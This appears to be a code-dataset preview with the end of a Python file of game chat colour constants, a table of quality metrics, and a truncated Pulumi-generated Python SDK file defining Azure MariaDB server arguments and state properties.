WTSystem = 2
WTBattleSOS = 3
WTEmote = 4
WTToontownBoardingGroup = 5
WTSwagForeman = 6
WHISPER_COLORS = {WTNormal: (
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))),
WTQuickTalker: (
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))),
WTSystem: (
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 1.0, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))),
WTEmote: (
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))),
WTSwagForeman: (
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.29, 0.6, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 0.9, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.5, 0.8, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.29, 0.6, 0.6)))}
````

avg_line_length: 37.6, max_line_length: 66, alphanum_fraction: 0.288032

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 1,600 | 0 |
| qsc_code_num_chars | 7,520 | 0 |
| qsc_code_mean_word_length | 1.35125 | 1 |
| qsc_code_frac_words_unique | 0.03125 | null |
| qsc_code_frac_chars_top_2grams | 0.300648 | 1 |
| qsc_code_frac_chars_top_3grams | 0.313599 | 1 |
| qsc_code_frac_chars_top_4grams | 0.333025 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.705828 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.684551 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0.684551 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0.683626 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0.6716 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0.667438 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.364833 | 1 |
| qsc_code_frac_chars_whitespace | 0.434309 | 0 |
| qsc_code_size_file_byte | 7,520 | 0 |
| qsc_code_num_lines | 200 | 0 |
| qsc_code_num_chars_line_max | 67 | 0 |
| qsc_code_num_chars_line_mean | 37.6 | 0 |
| qsc_code_frac_chars_alphabet | 0.143394 | 1 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.365 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 7
**Row 7**

| field | value |
|---|---|
| hexsha | 91c3f48c84eae4a4ae9cb1b87718a080946cdcad |
| size | 63,480 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | sdk/python/pulumi_azure/mariadb/server.py |
| repo_name (stars/issues/forks) | henriktao/pulumi-azure |
| repo_head_hexsha (stars/issues/forks) | f1cbcf100b42b916da36d8fe28be3a159abaf022 |
| repo_licenses (stars/issues/forks) | ["ECL-2.0", "Apache-2.0"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z |
| max_issues | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z |
| max_forks | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z |

content (truncated in this preview):

````python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServerArgs', 'Server']
@pulumi.input_type
class ServerArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
sku_name: pulumi.Input[str],
version: pulumi.Input[str],
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input['ServerStorageProfileArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Server resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku_name", sku_name)
pulumi.set(__self__, "version", version)
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_login_password is not None:
pulumi.set(__self__, "administrator_login_password", administrator_login_password)
if auto_grow_enabled is not None:
pulumi.set(__self__, "auto_grow_enabled", auto_grow_enabled)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if creation_source_server_id is not None:
pulumi.set(__self__, "creation_source_server_id", creation_source_server_id)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if restore_point_in_time is not None:
pulumi.set(__self__, "restore_point_in_time", restore_point_in_time)
if ssl_enforcement is not None:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
if ssl_enforcement is not None:
pulumi.set(__self__, "ssl_enforcement", ssl_enforcement)
if ssl_enforcement_enabled is not None:
pulumi.set(__self__, "ssl_enforcement_enabled", ssl_enforcement_enabled)
if storage_mb is not None:
pulumi.set(__self__, "storage_mb", storage_mb)
if storage_profile is not None:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
if storage_profile is not None:
pulumi.set(__self__, "storage_profile", storage_profile)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> pulumi.Input[str]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@sku_name.setter
def sku_name(self, value: pulumi.Input[str]):
pulumi.set(self, "sku_name", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@administrator_login_password.setter
def administrator_login_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login_password", value)
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
"""
return pulumi.get(self, "auto_grow_enabled")
@auto_grow_enabled.setter
def auto_grow_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_grow_enabled", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> Optional[pulumi.Input[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@creation_source_server_id.setter
def creation_source_server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_source_server_id", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> Optional[pulumi.Input[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@restore_point_in_time.setter
def restore_point_in_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restore_point_in_time", value)
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> Optional[pulumi.Input[str]]:
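"""
Deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.
"""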
return pulumi.get(self, "ssl_enforcement")
@ssl_enforcement.setter
def ssl_enforcement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_enforcement", value)
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@ssl_enforcement_enabled.setter
def ssl_enforcement_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssl_enforcement_enabled", value)
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> Optional[pulumi.Input[int]]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@storage_mb.setter
def storage_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_mb", value)
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> Optional[pulumi.Input['ServerStorageProfileArgs']]:
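"""
Deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.
"""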
return pulumi.get(self, "storage_profile")
@storage_profile.setter
def storage_profile(self, value: Optional[pulumi.Input['ServerStorageProfileArgs']]):
pulumi.set(self, "storage_profile", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServerState:
def __init__(__self__, *,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input['ServerStorageProfileArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Server resources.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[str] fqdn: The FQDN of the MariaDB Server.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_login_password is not None:
pulumi.set(__self__, "administrator_login_password", administrator_login_password)
if auto_grow_enabled is not None:
pulumi.set(__self__, "auto_grow_enabled", auto_grow_enabled)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if creation_source_server_id is not None:
pulumi.set(__self__, "creation_source_server_id", creation_source_server_id)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if restore_point_in_time is not None:
pulumi.set(__self__, "restore_point_in_time", restore_point_in_time)
if sku_name is not None:
pulumi.set(__self__, "sku_name", sku_name)
if ssl_enforcement is not None:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
if ssl_enforcement is not None:
pulumi.set(__self__, "ssl_enforcement", ssl_enforcement)
if ssl_enforcement_enabled is not None:
pulumi.set(__self__, "ssl_enforcement_enabled", ssl_enforcement_enabled)
if storage_mb is not None:
pulumi.set(__self__, "storage_mb", storage_mb)
if storage_profile is not None:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
if storage_profile is not None:
pulumi.set(__self__, "storage_profile", storage_profile)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@administrator_login_password.setter
def administrator_login_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login_password", value)
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
"""
return pulumi.get(self, "auto_grow_enabled")
@auto_grow_enabled.setter
def auto_grow_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_grow_enabled", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> Optional[pulumi.Input[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@creation_source_server_id.setter
def creation_source_server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_source_server_id", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
The FQDN of the MariaDB Server.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> Optional[pulumi.Input[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@restore_point_in_time.setter
def restore_point_in_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restore_point_in_time", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@sku_name.setter
def sku_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku_name", value)
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> Optional[pulumi.Input[str]]:
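"""
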